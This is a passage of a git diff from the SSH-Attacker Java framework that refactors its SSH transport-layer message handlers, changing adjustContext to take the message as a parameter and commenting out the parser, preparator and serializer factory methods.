b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/EcdhKeyExchangeReplyMessageHandler.java @@ -7,13 +7,10 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.message.EcdhKeyExchangeReplyMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.EcdhKeyExchangeReplyMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.EcdhKeyExchangeReplyMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.EcdhKeyExchangeReplyMessageSerializer; import de.rub.nds.sshattacker.core.protocol.util.KeyExchangeUtil; -import de.rub.nds.sshattacker.core.state.SshContext; public class EcdhKeyExchangeReplyMessageHandler extends SshMessageHandler { @@ -22,15 +19,15 @@ public EcdhKeyExchangeReplyMessageHandler(SshContext context) { super(context); } - public EcdhKeyExchangeReplyMessageHandler( + /*public EcdhKeyExchangeReplyMessageHandler( SshContext context, EcdhKeyExchangeReplyMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(EcdhKeyExchangeReplyMessage message) { KeyExchangeUtil.handleHostKeyMessage(context, message); - updateContextWithRemotePublicKey(); + updateContextWithRemotePublicKey(message); KeyExchangeUtil.computeSharedSecret(context, context.getChooser().getEcdhKeyExchange()); KeyExchangeUtil.computeExchangeHash(context); KeyExchangeUtil.handleExchangeHashSignatureMessage(context, message); @@ -38,7 +35,7 @@ public void adjustContext() { KeyExchangeUtil.generateKeySet(context); } - private void updateContextWithRemotePublicKey() { + private void updateContextWithRemotePublicKey(EcdhKeyExchangeReplyMessage message) { context.getChooser() .getEcdhKeyExchange() .setRemotePublicKey(message.getEphemeralPublicKey().getValue()); @@ -46,7 +43,7 @@ private void updateContextWithRemotePublicKey() { .setEcdhServerPublicKey(message.getEphemeralPublicKey().getValue()); } - @Override + /*@Override public EcdhKeyExchangeReplyMessageParser getParser(byte[] array) { return new EcdhKeyExchangeReplyMessageParser(array); } @@ -64,5 +61,5 @@ public EcdhKeyExchangeReplyMessagePreparator getPreparator() { @Override public EcdhKeyExchangeReplyMessageSerializer getSerializer() { return new EcdhKeyExchangeReplyMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/HybridKeyExchangeInitMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/HybridKeyExchangeInitMessageHandler.java index 9883c126e..513636bdb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/HybridKeyExchangeInitMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/HybridKeyExchangeInitMessageHandler.java @@ -7,14 +7,10 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; -import de.rub.nds.sshattacker.core.crypto.kex.HybridKeyExchange; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.transport.message.HybridKeyExchangeInitMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.HybridKeyExchangeInitMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.HybridKeyExchangeInitMessagePreperator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.HybridKeyExchangeInitMessageSerializer; import de.rub.nds.sshattacker.core.protocol.util.KeyExchangeUtil; -import de.rub.nds.sshattacker.core.state.SshContext; public class HybridKeyExchangeInitMessageHandler extends SshMessageHandler { @@ -23,13 +19,13 @@ public HybridKeyExchangeInitMessageHandler(SshContext context) { super(context); } - public HybridKeyExchangeInitMessageHandler( + /*public HybridKeyExchangeInitMessageHandler( SshContext context, HybridKeyExchangeInitMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(HybridKeyExchangeInitMessage message) { context.getChooser() .getHybridKeyExchange() .getKeyAgreement() @@ -60,7 +56,7 @@ public void adjustContext() { } } - @Override + /*@Override public HybridKeyExchangeInitMessageParser getParser(byte[] array) { HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); return new HybridKeyExchangeInitMessageParser( @@ -92,5 +88,5 @@ public HybridKeyExchangeInitMessagePreperator getPreparator() { public HybridKeyExchangeInitMessageSerializer getSerializer() { HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); return new HybridKeyExchangeInitMessageSerializer(message, kex.getCombiner()); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/HybridKeyExchangeReplyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/HybridKeyExchangeReplyMessageHandler.java index f41533cfa..bb38a4f05 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/HybridKeyExchangeReplyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/HybridKeyExchangeReplyMessageHandler.java @@ -8,17 +8,10 @@ package de.rub.nds.sshattacker.core.protocol.transport.handler; import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.sshattacker.core.crypto.kex.HybridKeyExchange; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; -import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.transport.message.HybridKeyExchangeReplyMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.HybridKeyExchangeReplyMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.HybridKeyExchangeReplyMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.HybridKeyExchangeReplyMessageSerializer; import de.rub.nds.sshattacker.core.protocol.util.KeyExchangeUtil; -import de.rub.nds.sshattacker.core.state.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -31,15 +24,15 @@ public HybridKeyExchangeReplyMessageHandler(SshContext context) { super(context); } - public HybridKeyExchangeReplyMessageHandler( + /*public HybridKeyExchangeReplyMessageHandler( SshContext context, HybridKeyExchangeReplyMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(HybridKeyExchangeReplyMessage message) { KeyExchangeUtil.handleHostKeyMessage(context, message); - setRemoteValues(); + setRemoteValues(message); context.getChooser().getHybridKeyExchange().combineSharedSecrets(); context.setSharedSecret(context.getChooser().getHybridKeyExchange().getSharedSecret()); context.getExchangeHashInputHolder() @@ -50,7 +43,7 @@ public void adjustContext() { KeyExchangeUtil.generateKeySet(context); } - private void setRemoteValues() { + private void setRemoteValues(HybridKeyExchangeReplyMessage message) { context.getChooser() .getHybridKeyExchange() .getKeyAgreement() @@ -91,7 +84,7 @@ private void setRemoteValues() { } } - @Override + /*@Override public SshMessageParser getParser(byte[] array) { HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); return new HybridKeyExchangeReplyMessageParser( @@ -121,5 +114,5 @@ public SshMessagePreparator getPreparator() { public SshMessageSerializer getSerializer() { HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); return new HybridKeyExchangeReplyMessageSerializer(message, kex.getCombiner()); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/IgnoreMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/IgnoreMessageHandler.java index b80dda17b..7c4f23eed 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/IgnoreMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/IgnoreMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.message.IgnoreMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.IgnoreMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.IgnoreMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.IgnoreMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class IgnoreMessageHandler extends SshMessageHandler { @@ -20,14 +17,14 @@ public IgnoreMessageHandler(SshContext context) { super(context); } - public IgnoreMessageHandler(SshContext context, IgnoreMessage message) { + /*public IgnoreMessageHandler(SshContext context, IgnoreMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() {} + public void adjustContext(IgnoreMessage message) {} - @Override + /*@Override public IgnoreMessageParser getParser(byte[] array) { return new IgnoreMessageParser(array); } @@ -45,5 +42,5 @@ public IgnoreMessagePreparator getPreparator() { @Override public IgnoreMessageSerializer getSerializer() { return new IgnoreMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java index 41b2522ce..334e4fd98 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java @@ -8,13 +8,10 @@ package de.rub.nds.sshattacker.core.protocol.transport.handler; import de.rub.nds.sshattacker.core.constants.*; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.message.KeyExchangeInitMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.KeyExchangeInitMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.KeyExchangeInitMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.KeyExchangeInitMessageSerializer; import de.rub.nds.sshattacker.core.protocol.util.AlgorithmPicker; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; import java.util.Arrays; @@ -24,12 +21,12 @@ public KeyExchangeInitMessageHandler(SshContext context) { super(context); } - public KeyExchangeInitMessageHandler(SshContext context, KeyExchangeInitMessage message) { + /*public KeyExchangeInitMessageHandler(SshContext context, KeyExchangeInitMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(KeyExchangeInitMessage message) { if (context.isHandleAsClient()) { context.setServerCookie(message.getCookie().getValue()); context.setServerSupportedKeyExchangeAlgorithms( @@ -195,7 +192,7 @@ private void pickAlgorithms() { } } - @Override + /*@Override public KeyExchangeInitMessageParser getParser(byte[] array) { return new KeyExchangeInitMessageParser(array); } @@ -213,5 +210,5 @@ public KeyExchangeInitMessagePreparator getPreparator() { @Override public KeyExchangeInitMessageSerializer getSerializer() { return new KeyExchangeInitMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewKeysMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewKeysMessageHandler.java index 0c02dfa5f..d4ad5ed0e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewKeysMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewKeysMessageHandler.java @@ -8,15 +8,12 @@ package de.rub.nds.sshattacker.core.protocol.transport.handler; import de.rub.nds.sshattacker.core.constants.*; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.message.NewKeysMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.NewKeysMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.NewKeysMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.NewKeysMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import java.util.Objects; import java.util.Optional; @@ -28,12 +25,12 @@ public NewKeysMessageHandler(SshContext context) { super(context); } - public NewKeysMessageHandler(SshContext context, NewKeysMessage message) { + /*public NewKeysMessageHandler(SshContext context, NewKeysMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(NewKeysMessage message) { if (context.getConfig().getEnableEncryptionOnNewKeysMessage()) { adjustEncryptionForDirection(true); } @@ -132,7 +129,7 @@ private void adjustCompressionForDirection(boolean receive) { } } - @Override + /*@Override public NewKeysMessageParser getParser(byte[] array) { return new NewKeysMessageParser(array); } @@ -150,5 +147,5 @@ public NewKeysMessagePreparator getPreparator() { @Override public NewKeysMessageSerializer getSerializer() { return new NewKeysMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangeDoneMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangeDoneMessageHandler.java index 3838b4fdf..cf84f1bde 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangeDoneMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangeDoneMessageHandler.java @@ -7,16 +7,10 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; -import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.transport.message.RsaKeyExchangeDoneMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.RsaKeyExchangeDoneMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.RsaKeyExchangeDoneMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.RsaKeyExchangeDoneMessageSerializer; import de.rub.nds.sshattacker.core.protocol.util.KeyExchangeUtil; -import de.rub.nds.sshattacker.core.state.SshContext; public class RsaKeyExchangeDoneMessageHandler extends SshMessageHandler { @@ -24,19 +18,19 @@ public RsaKeyExchangeDoneMessageHandler(SshContext context) { super(context); } - public RsaKeyExchangeDoneMessageHandler(SshContext context, RsaKeyExchangeDoneMessage message) { + /*public RsaKeyExchangeDoneMessageHandler(SshContext context, RsaKeyExchangeDoneMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(RsaKeyExchangeDoneMessage message) { KeyExchangeUtil.computeExchangeHash(context); KeyExchangeUtil.handleExchangeHashSignatureMessage(context, message); KeyExchangeUtil.setSessionId(context); KeyExchangeUtil.generateKeySet(context); } - @Override + /*@Override public SshMessageParser getParser(byte[] array) { return new RsaKeyExchangeDoneMessageParser(array); } @@ -54,5 +48,5 @@ public SshMessagePreparator getPreparator() { @Override public SshMessageSerializer getSerializer() { return new RsaKeyExchangeDoneMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangePubkeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangePubkeyMessageHandler.java index 06bf20a5a..f4fda7a3b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangePubkeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangePubkeyMessageHandler.java @@ -7,16 +7,10 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; -import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.transport.message.RsaKeyExchangePubkeyMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.RsaKeyExchangePubkeyMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.RsaKeyExchangePubkeyMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.RsaKeyExchangePubkeyMessageSerializer; import de.rub.nds.sshattacker.core.protocol.util.KeyExchangeUtil; -import de.rub.nds.sshattacker.core.state.SshContext; public class RsaKeyExchangePubkeyMessageHandler extends SshMessageHandler { @@ -25,13 +19,13 @@ public RsaKeyExchangePubkeyMessageHandler(SshContext context) { super(context); } - public RsaKeyExchangePubkeyMessageHandler( + /*public RsaKeyExchangePubkeyMessageHandler( SshContext context, RsaKeyExchangePubkeyMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(RsaKeyExchangePubkeyMessage message) { KeyExchangeUtil.handleHostKeyMessage(context, message); updateContextWithTransientPublicKey(message); } @@ -41,7 +35,7 @@ private void updateContextWithTransientPublicKey(RsaKeyExchangePubkeyMessage mes context.getExchangeHashInputHolder().setRsaTransientKey(message.getTransientPublicKey()); } - @Override + /*@Override public SshMessageParser getParser(byte[] array) { return new RsaKeyExchangePubkeyMessageParser(array); } @@ -61,5 +55,5 @@ public SshMessagePreparator getPreparator() { public SshMessageSerializer getSerializer() { // TODO: Implement Serializer return new RsaKeyExchangePubkeyMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangeSecretMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangeSecretMessageHandler.java index 71997809d..d5d6ded19 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangeSecretMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangeSecretMessageHandler.java @@ -10,15 +10,9 @@ import de.rub.nds.sshattacker.core.crypto.hash.ExchangeHashInputHolder; import de.rub.nds.sshattacker.core.crypto.kex.RsaKeyExchange; import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; -import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; -import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.transport.message.RsaKeyExchangeSecretMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.RsaKeyExchangeSecretMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.RsaKeyExchangeSecretMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.RsaKeyExchangeSecretMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class RsaKeyExchangeSecretMessageHandler extends SshMessageHandler { @@ -27,18 +21,18 @@ public RsaKeyExchangeSecretMessageHandler(SshContext context) { super(context); } - public RsaKeyExchangeSecretMessageHandler( + /*public RsaKeyExchangeSecretMessageHandler( SshContext context, RsaKeyExchangeSecretMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { - decryptSharedSecret(); - updateExchangeHashWithSecrets(); + public void adjustContext(RsaKeyExchangeSecretMessage message) { + decryptSharedSecret(message); + updateExchangeHashWithSecrets(message); } - private void decryptSharedSecret() { + private void decryptSharedSecret(RsaKeyExchangeSecretMessage message) { RsaKeyExchange keyExchange = context.getChooser().getRsaKeyExchange(); try { keyExchange.decryptSharedSecret(message.getEncryptedSecret().getValue()); @@ -50,7 +44,7 @@ private void decryptSharedSecret() { } } - private void updateExchangeHashWithSecrets() { + private void updateExchangeHashWithSecrets(RsaKeyExchangeSecretMessage message) { RsaKeyExchange keyExchange = context.getChooser().getRsaKeyExchange(); ExchangeHashInputHolder inputHolder = context.getExchangeHashInputHolder(); inputHolder.setRsaEncryptedSecret(message.getEncryptedSecret().getValue()); @@ -62,7 +56,7 @@ private void updateExchangeHashWithSecrets() { } } - @Override + /*@Override public SshMessageParser getParser(byte[] array) { return new RsaKeyExchangeSecretMessageParser(array); } @@ -81,5 +75,5 @@ public SshMessagePreparator getPreparator() { @Override public SshMessageSerializer getSerializer() { return new RsaKeyExchangeSecretMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/ServiceAcceptMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/ServiceAcceptMessageHandler.java index e39b03445..4de792b9d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/ServiceAcceptMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/ServiceAcceptMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.message.ServiceAcceptMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.ServiceAcceptMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.ServiceAcceptMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.ServiceAcceptMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class ServiceAcceptMessageHandler extends SshMessageHandler { @@ -20,16 +17,16 @@ public ServiceAcceptMessageHandler(SshContext context) { super(context); } - public ServiceAcceptMessageHandler(SshContext context, ServiceAcceptMessage message) { + /*public ServiceAcceptMessageHandler(SshContext context, ServiceAcceptMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ServiceAcceptMessage message) { // TODO: Handle ServiceAcceptMessage } - @Override + /*@Override public ServiceAcceptMessageParser getParser(byte[] array) { return new ServiceAcceptMessageParser(array); } @@ -47,5 +44,5 @@ public ServiceAcceptMessagePreparator getPreparator() { @Override public ServiceAcceptMessageSerializer getSerializer() { return new ServiceAcceptMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/ServiceRequestMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/ServiceRequestMessageHandler.java index d0bd22285..9d73c65be 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/ServiceRequestMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/ServiceRequestMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.message.ServiceRequestMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.ServiceRequestMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.ServiceRequestMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.ServiceRequestMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class ServiceRequestMessageHandler extends SshMessageHandler { @@ -20,16 +17,16 @@ public ServiceRequestMessageHandler(SshContext context) { super(context); } - public ServiceRequestMessageHandler(SshContext context, ServiceRequestMessage message) { + /*public ServiceRequestMessageHandler(SshContext context, ServiceRequestMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ServiceRequestMessage message) { // TODO: Handle ServiceRequestMessage } - @Override + /*@Override public ServiceRequestMessageParser getParser(byte[] array) { return new ServiceRequestMessageParser(array); } @@ -47,5 +44,5 @@ public ServiceRequestMessagePreparator getPreparator() { @Override public ServiceRequestMessageSerializer getSerializer() { return new ServiceRequestMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/UnimplementedMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/UnimplementedMessageHandler.java index e8d9a68d5..3292cdfa8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/UnimplementedMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/UnimplementedMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.message.UnimplementedMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.UnimplementedMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.UnimplementedMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.UnimplementedMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class UnimplementedMessageHandler extends SshMessageHandler { @@ -20,16 +17,16 @@ public UnimplementedMessageHandler(SshContext context) { super(context); } - public UnimplementedMessageHandler(SshContext context, UnimplementedMessage message) { + /*public UnimplementedMessageHandler(SshContext context, UnimplementedMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(UnimplementedMessage message) { // TODO: Handle UnimplementedMessage } - @Override + /*@Override public UnimplementedMessageParser getParser(byte[] array) { return new UnimplementedMessageParser(array); } @@ -47,5 +44,5 @@ public UnimplementedMessagePreparator getPreparator() { @Override public UnimplementedMessageSerializer getSerializer() { return new UnimplementedMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/UnknownMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/UnknownMessageHandler.java index de612e58c..87a4f089e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/UnknownMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/UnknownMessageHandler.java @@ -8,12 +8,9 @@ package de.rub.nds.sshattacker.core.protocol.transport.handler; import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.message.UnknownMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.UnknownMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.UnknownMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.UnknownMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -25,18 +22,18 @@ public UnknownMessageHandler(SshContext context) { super(context); } - public UnknownMessageHandler(SshContext context, UnknownMessage message) { + /*public UnknownMessageHandler(SshContext context, UnknownMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(UnknownMessage message) { LOGGER.debug( "Received unknown message:\n" + ArrayConverter.bytesToHexString(message.getPayload())); } - @Override + /*@Override public UnknownMessageParser getParser(byte[] array) { return new UnknownMessageParser(array); } @@ -54,5 +51,5 @@ public SshMessagePreparator getPreparator() { @Override public UnknownMessageSerializer getSerializer() { return new UnknownMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/VersionExchangeMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/VersionExchangeMessageHandler.java index 75aa30bca..87156b47b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/VersionExchangeMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/VersionExchangeMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.transport.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.transport.message.VersionExchangeMessage; -import de.rub.nds.sshattacker.core.protocol.transport.parser.VersionExchangeMessageParser; -import de.rub.nds.sshattacker.core.protocol.transport.preparator.VersionExchangeMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.transport.serializer.VersionExchangeMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class VersionExchangeMessageHandler extends ProtocolMessageHandler { @@ -20,12 +17,12 @@ public VersionExchangeMessageHandler(SshContext context) { super(context); } - public VersionExchangeMessageHandler(SshContext context, VersionExchangeMessage message) { + /*public VersionExchangeMessageHandler(SshContext context, VersionExchangeMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(VersionExchangeMessage message) 